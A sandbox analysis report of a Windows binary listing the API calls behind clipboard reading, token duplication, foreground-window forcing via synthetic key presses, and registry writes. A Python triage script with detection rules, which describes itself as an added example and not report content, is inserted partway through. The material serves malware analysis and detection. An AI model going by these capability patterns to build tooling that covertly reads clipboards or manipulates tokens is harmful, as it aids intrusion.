                                                    • Instruction ID: 69663e521434afa4010cf09d90d8b0c7d8e613e362e57c3432d81187bc2f8f69
                                                    • Opcode Fuzzy Hash: 9f9725cf56e2b252b67d1f4a0104ba18a44dcaaf7777a79094df3a8b3da8c11f
                                                    • Instruction Fuzzy Hash: 12B09B6C315510055D14573D25080562301B8937A57D517D1D475451E2933D490BD514
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003E32AB: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,003E32EA,00000000,?,003E9EFE,000000FF,0000001E,0047BE28,00000008,003E9E62,00000000,?), ref: 003E32BA
                                                      • Part of subcall function 003E32AB: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 003E32CC
                                                    • ExitProcess.KERNEL32 ref: 003E32EE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AddressExitHandleModuleProcProcess
                                                    • String ID:
                                                    • API String ID: 75539706-0
                                                    • Opcode ID: 79ea82db1b31a5c474ebd671a8353dcd6e5fa186ca38999527781511414ef25c
                                                    • Instruction ID: 54e7a0934193033c2c510345d8f3227b543f837c6c3e2d7b713411d046eb6ed8
                                                    • Opcode Fuzzy Hash: 79ea82db1b31a5c474ebd671a8353dcd6e5fa186ca38999527781511414ef25c
                                                    • Instruction Fuzzy Hash: 54B09231000008BBDB022F12EC0A8A93F29FF026D57014021F80408070CB335A92DA90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                     • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                     • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                     • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 240bf745a6459069f7ae9820c927726e76a73718ba73111390723c31c3d68aba
                                                    • Instruction ID: ab16b22948fb64099c8d03b623025f745867141d578d5547fb2b6fa574a2c8ca
                                                    • Opcode Fuzzy Hash: 240bf745a6459069f7ae9820c927726e76a73718ba73111390723c31c3d68aba
                                                    • Instruction Fuzzy Hash: BC314470A00545DBC71ACF5AC4C0969F7A6FF89300B298BA5E00ADB691D7B0EDC1CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00423D4E: FindFirstFileW.KERNELBASE(?,?), ref: 00423DC5
                                                      • Part of subcall function 00423D4E: DeleteFileW.KERNEL32(?,?,?,?), ref: 00423E15
                                                      • Part of subcall function 00423D4E: FindNextFileW.KERNEL32(00000000,00000010), ref: 00423E26
                                                      • Part of subcall function 00423D4E: FindClose.KERNEL32(00000000), ref: 00423E3D
                                                    • GetLastError.KERNEL32 ref: 0042BEBA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                    • String ID:
                                                    • API String ID: 2191629493-0
                                                    • Opcode ID: 2f7ed6036cd099d3de9fff452c83aaffd9ee2eb0087e4fc67fa941f7625ecea7
                                                    • Instruction ID: 78d1ec7e1ce0996d732e778a63c3bd0bd081f7d758f9ca930775787ac64ef5b2
                                                    • Opcode Fuzzy Hash: 2f7ed6036cd099d3de9fff452c83aaffd9ee2eb0087e4fc67fa941f7625ecea7
                                                    • Instruction Fuzzy Hash: 5BF058363102109FCB11EF5AE845F6AB7E8AF48B20F05801EF94A8B352CB74BC01CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0044CE50
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044CE91
                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0044CED6
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044CF00
                                                    • SendMessageW.USER32 ref: 0044CF29
                                                    • GetKeyState.USER32(00000011), ref: 0044CFC2
                                                    • GetKeyState.USER32(00000009), ref: 0044CFCF
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044CFE5
                                                    • GetKeyState.USER32(00000010), ref: 0044CFEF
                                                    • SendMessageW.USER32(?,0000110A,00000009,?), ref: 0044D018
                                                    • SendMessageW.USER32 ref: 0044D03F
                                                    • SendMessageW.USER32(?,00001030,?,0044B602), ref: 0044D145
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0044D15B
                                                    • ImageList_BeginDrag.COMCTL32(?,000000F8,000000F0), ref: 0044D16E
                                                    • SetCapture.USER32(?), ref: 0044D177
                                                    • ClientToScreen.USER32(?,?), ref: 0044D1DC
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0044D1E9
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0044D203
                                                    • ReleaseCapture.USER32(?,?,?), ref: 0044D20E
                                                    • GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 0044D248
                                                    • ScreenToClient.USER32 ref: 0044D255
                                                    • SendMessageW.USER32(?,00001012,004867B0,?), ref: 0044D2B1
                                                    • SendMessageW.USER32 ref: 0044D2DF
                                                    • SendMessageW.USER32(?,00001111,004867B0,?), ref: 0044D31C
                                                    • SendMessageW.USER32 ref: 0044D34B
                                                    • SendMessageW.USER32(?,0000110B,00000009,004867B0), ref: 0044D36C
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0044D37B
                                                    • GetCursorPos.USER32(?), ref: 0044D39B
                                                    • ScreenToClient.USER32 ref: 0044D3A8
                                                    • GetParent.USER32(?), ref: 0044D3C8
                                                    • SendMessageW.USER32(?,00001012,004867B0,?), ref: 0044D431
                                                    • SendMessageW.USER32 ref: 0044D462
                                                    • ClientToScreen.USER32(?,?), ref: 0044D4C0
                                                    • TrackPopupMenuEx.USER32(?,004867B0,?,?,?,004867B0), ref: 0044D4F0
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044D51A
                                                    • SendMessageW.USER32 ref: 0044D53D
                                                    • ClientToScreen.USER32(?,?), ref: 0044D58F
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0044D5C3
                                                      • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044D65F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                    • String ID: @GUI_DRAGID$F$prH
                                                    • API String ID: 3429851547-816717882
                                                    • Opcode ID: b38515c01aab1ff4aa212f227d70f1215d5454e5c33415c13b7544e5e653f0cf
                                                    • Instruction ID: 36ad07642915fa84c60eac4ff8d66a656aae5660fb1fd9fa0ae89f49c5ad8f75
                                                    • Opcode Fuzzy Hash: b38515c01aab1ff4aa212f227d70f1215d5454e5c33415c13b7544e5e653f0cf
                                                    • Instruction Fuzzy Hash: 6F42BE34505240AFE721CF28C884FABBBE5FF49314F18092EF699972A1C7359855CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EncodePointer.KERNEL32(00484388,00000000,00484388,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010), ref: 003F5CF4
                                                    • LoadLibraryExW.KERNEL32(USER32.DLL,00484388,00000800,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010), ref: 003F5D1A
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5D26
                                                    • LoadLibraryExW.KERNEL32(USER32.DLL,00484388,00484388,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010), ref: 003F5D3C
                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 003F5D52
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5D61
                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 003F5D6E
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5D75
                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 003F5D82
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5D89
                                                    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 003F5D96
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5D9D
                                                    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 003F5DAE
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5DB5
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5DBF
                                                    • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5DD1
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5DEF
                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5E11
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5E1C
                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5E61
                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5E79
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5E8D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Pointer$DecodeEncode$AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPresentString
                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                    • API String ID: 3166169540-564504941
                                                    • Opcode ID: 7cc274cc2ebb600fba263d04d8d873931e91bc720cd3461c5c492e27de44e98d
                                                    • Instruction ID: 59aef35fcbad157bcd52272d55134fa7fd8c4ae7a6da112b48353fc55e49d774
                                                    • Opcode Fuzzy Hash: 7cc274cc2ebb600fba263d04d8d873931e91bc720cd3461c5c492e27de44e98d
                                                    • Instruction Fuzzy Hash: AE518D75A01A09AFDB129FB49C48ABF7BA8FF45740B25052AF705E2050DB349D04CBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?), ref: 003C4A3D
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003FDA8E
                                                    • IsIconic.USER32(?), ref: 003FDA97
                                                    • ShowWindow.USER32(?,00000009,?,?), ref: 003FDAA4
                                                    • SetForegroundWindow.USER32(?,?,?), ref: 003FDAAE
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003FDAC4
                                                    • GetCurrentThreadId.KERNEL32 ref: 003FDACB
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 003FDAD7
                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?), ref: 003FDAE8
                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?), ref: 003FDAF0
                                                    • AttachThreadInput.USER32(00000000,?,00000001,?,?), ref: 003FDAF8
                                                    • SetForegroundWindow.USER32(?,?,?), ref: 003FDAFB
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FDB10
                                                    • keybd_event.USER32 ref: 003FDB1B
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FDB25
                                                    • keybd_event.USER32 ref: 003FDB2A
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FDB33
                                                    • keybd_event.USER32 ref: 003FDB38
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FDB42
                                                    • keybd_event.USER32 ref: 003FDB47
                                                    • SetForegroundWindow.USER32(?,?,?), ref: 003FDB4A
                                                    • AttachThreadInput.USER32(?,?,00000000,?,?), ref: 003FDB71
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: c1dc4d73bb27f8d865931f8040ee53ef02592e962607d628a5eb9325b7254c7d
                                                    • Instruction ID: c41d2f500aee6aead1f7020ee5e205326f79fbc9f750035d129ae5624ea6bc91
                                                    • Opcode Fuzzy Hash: c1dc4d73bb27f8d865931f8040ee53ef02592e962607d628a5eb9325b7254c7d
                                                    • Instruction Fuzzy Hash: A7317075A8021CBAEF226FA19C49FBF3E6DEB45B50F114035FA04EA1D1C6B05D01ABA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00418CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00418D0D
                                                      • Part of subcall function 00418CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418D3A
                                                      • Part of subcall function 00418CC3: GetLastError.KERNEL32 ref: 00418D47
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004188ED
                                                    • CloseHandle.KERNEL32(?), ref: 004188FE
                                                    • OpenWindowStationW.USER32 ref: 00418915
                                                    • GetProcessWindowStation.USER32 ref: 0041892E
                                                    • SetProcessWindowStation.USER32(00000000), ref: 00418938
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00418952
                                                      • Part of subcall function 00418713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00418AEE), ref: 00418728
                                                      • Part of subcall function 00418713: CloseHandle.KERNEL32(?,00000000,00418AEE), ref: 0041873A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue
                                                    • String ID: $default$winsta0
                                                    • API String ID: 3576815822-1027155976
                                                    • Opcode ID: 24c68e20e48f3bb69d54116618c59af600ee4e63275a4c6279e84e3ec7488f04
                                                    • Instruction ID: 5ca29d90147126f0ad482bdce417a0ef00b4431f2099e73a0b91cd086799805d
                                                    • Opcode Fuzzy Hash: 24c68e20e48f3bb69d54116618c59af600ee4e63275a4c6279e84e3ec7488f04
                                                    • Instruction Fuzzy Hash: 6B814971940209BFDF11DFA0DC45AEFBBB8EF05345F08412BF910A6261DB398E959B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • OpenClipboard.USER32(0044F910), ref: 00434284
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00434292
                                                    • GetClipboardData.USER32 ref: 0043429A
                                                    • CloseClipboard.USER32 ref: 004342A6
                                                    • GlobalLock.KERNEL32 ref: 004342C2
                                                    • CloseClipboard.USER32 ref: 004342CC
                                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 004342E1
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 004342EE
                                                    • GetClipboardData.USER32 ref: 004342F6
                                                    • GlobalLock.KERNEL32 ref: 00434303
                                                    • GlobalUnlock.KERNEL32(00000000,00000000,?,00000000), ref: 00434337
                                                    • CloseClipboard.USER32 ref: 00434447
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: 3992cb3fa4dc5e4dbca50eb07d72cba9933735144f8dc23e07de16c7cbd91524
                                                    • Instruction ID: a0cb9307e3b6ec923825ccd1def7d82394c2310900bbbe30c10265b04802a405
                                                    • Opcode Fuzzy Hash: 3992cb3fa4dc5e4dbca50eb07d72cba9933735144f8dc23e07de16c7cbd91524
                                                    • Instruction Fuzzy Hash: 465191392042016BD301AF60EC85FAF77A8AF89B00F11457EF555D62A1DF74ED098B6A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
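The four records above are easier to triage once their API lines are parsed into sets and matched against behaviour rules: the routine at 003F5CF4 resolves USER32.DLL/MessageBoxW under the caption "Microsoft Visual C++ Runtime Library" (the MSVC runtime's error message-box path, so its IsDebuggerPresent call is runtime boilerplate rather than an evasion check), the routine at 003C4A3D attaches thread input and synthesises ALT (VK_MENU, 0x12) key presses to force a window to the foreground, the routine at 004188ED duplicates a token and opens winsta0\default, and the routine at 00434284 reads CF_UNICODETEXT/CF_TEXT from the clipboard. The script below is an added example, not part of this report and not Joe Sandbox code; the rule names, verdicts, notes and the embedded SAMPLE (API lines copied from those four records) are the example's own constructs.

```python
"""Triage helper for the per-function "APIs" listings of a Joe Sandbox report.

Added example, not report content and not Joe Sandbox code: it parses API call
lines like the ones above into per-function records and applies a few behaviour
rules, so runtime boilerplate (the MSVC CRT message-box path, AutoIt WinActivate,
RunAs and ClipGet) can be separated from calls that deserve a closer look. Rule
names, verdicts and SAMPLE (lines copied from four listings above) are this
example's own constructs.
"""
import re
from typing import Callable, Dict, List, Set, Tuple

# Constructed sample: API lines copied from four function records in this report.
SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(USER32.DLL,00484388,00000800,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010), ref: 003F5D1A
• GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 003F5D52
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5DBF
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003FDA8E
• SetForegroundWindow.USER32(?,?,?), ref: 003FDAAE
• AttachThreadInput.USER32(?,00000000,00000001,?,?), ref: 003FDAE8
• MapVirtualKeyW.USER32(00000012,00000000), ref: 003FDB10
• keybd_event.USER32 ref: 003FDB1B
APIs
  • Part of subcall function 00418CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418D3A
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004188ED
• OpenWindowStationW.USER32 ref: 00418915
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00418952
APIs
• OpenClipboard.USER32(0044F910), ref: 00434284
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00434292
• GetClipboardData.USER32 ref: 0043429A
• IsClipboardFormatAvailable.USER32(00000001), ref: 004342EE
"""

API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX = re.compile(r"[0-9A-Fa-f]+")
CLIPBOARD_FORMATS = {"00000001": "CF_TEXT", "0000000D": "CF_UNICODETEXT"}


def parse_functions(text: str) -> List[Dict]:
    """One record per 'APIs' header: direct calls, callee APIs, resolved strings."""
    functions: List[Dict] = []
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"calls": [], "subcall": set(), "strings": set()}
            functions.append(current)
            continue
        m = API_LINE.search(line) if current is not None else None
        if not m:
            continue
        args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        if m.group("sub"):
            current["subcall"].add(m.group("api"))  # reached through a callee
        else:
            current["calls"].append((m.group("api"), args, m.group("ref")))
        # Anything that is neither '?' nor a hex literal is a string the sandbox resolved
        current["strings"].update(a for a in args if a != "?" and not HEX.fullmatch(a))
    return functions


def apis(func: Dict) -> Set[str]:
    return {api for api, _, _ in func["calls"]} | func["subcall"]


def presses_alt(func: Dict) -> bool:
    """VK_MENU (ALT) is 0x12: MapVirtualKeyW(00000012, ...) feeding keybd_event."""
    return any(api == "MapVirtualKeyW" and args[:1] == ["00000012"]
               for api, args, _ in func["calls"])


def clipboard_formats(func: Dict) -> List[str]:
    """Clipboard formats the function probes, in call order."""
    return [CLIPBOARD_FORMATS.get(args[0], args[0])
            for api, args, _ in func["calls"]
            if api == "IsClipboardFormatAvailable" and args]


# (rule name, predicate, verdict, analyst note); all four are this example's constructs
RULES: List[Tuple[str, Callable[[Dict], bool], str, str]] = [
    ("crt_runtime_error_box",
     lambda f: {"LoadLibraryExW", "GetProcAddress", "IsDebuggerPresent"} <= apis(f)
     and "Microsoft Visual C++ Runtime Library" in f["strings"],
     "noise", "MSVC CRT message-box path: IsDebuggerPresent here is runtime boilerplate, not evasion"),
    ("foreground_lock_bypass",
     lambda f: {"AttachThreadInput", "SetForegroundWindow", "keybd_event"} <= apis(f),
     "review", "AttachThreadInput plus a synthetic key press to force a window to the foreground"),
    ("token_to_interactive_desktop",
     lambda f: {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"} <= apis(f),
     "review", "duplicates a token and opens winsta0\\default: run-as plumbing, check what it launches"),
    ("clipboard_read",
     lambda f: {"OpenClipboard", "GetClipboardData"} <= apis(f),
     "review", "reads clipboard contents"),
]


def triage(text: str) -> Dict[str, Dict]:
    """Key each function by its first direct call's ref address and attach findings."""
    report: Dict[str, Dict] = {}
    for func in parse_functions(text):
        if not func["calls"]:
            continue
        hits = [(name, verdict, note) for name, pred, verdict, note in RULES if pred(func)]
        verdicts = {v for _, v, _ in hits}
        report[func["calls"][0][2]] = {
            "rules": [n for n, _, _ in hits],
            "notes": [note for _, _, note in hits],
            "verdict": "review" if "review" in verdicts else ("noise" if hits else "unmatched"),
            "strings": sorted(func["strings"]),
        }
    return report


if __name__ == "__main__":
    for ref, finding in triage(SAMPLE).items():
        print(ref, finding["verdict"], ", ".join(finding["rules"]) or "-", finding["strings"])
```

Run stand-alone, the CRT record comes back as noise and the other three as review; each record's strings list carries the resolved literals (USER32.DLL, MessageBoxW, Shell_TrayWnd, default) that the report's String ID lines summarise. Extend RULES with one predicate per API pattern you want separated from runtime noise, and paste further "APIs" blocks from the report into the input to classify them the same way.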

                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440BDE
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0044F910,00000000,?,00000000,?,?), ref: 00440C4C
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00440C94
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00440D1D
                                                    • RegCloseKey.ADVAPI32(?), ref: 0044103D
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044104A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: 2588b82e21df43f28b429d7311f27c5a177cc7839ad39164c126fa296ba778ee
                                                    • Instruction ID: 0f531c91b705ab0f30893a502f3cd797eaa08c1a80924ff5ad534fc9fd0d1319
                                                    • Opcode Fuzzy Hash: 2588b82e21df43f28b429d7311f27c5a177cc7839ad39164c126fa296ba778ee
                                                    • Instruction Fuzzy Hash: D10267752006119FDB15EF25C885F2AB7E5EF88714F05885EF98A9B3A2CB34EC41CB85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000003,?,74B061D0,?,00000000), ref: 0042F221
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0042F25F
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0042F279
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0042F291
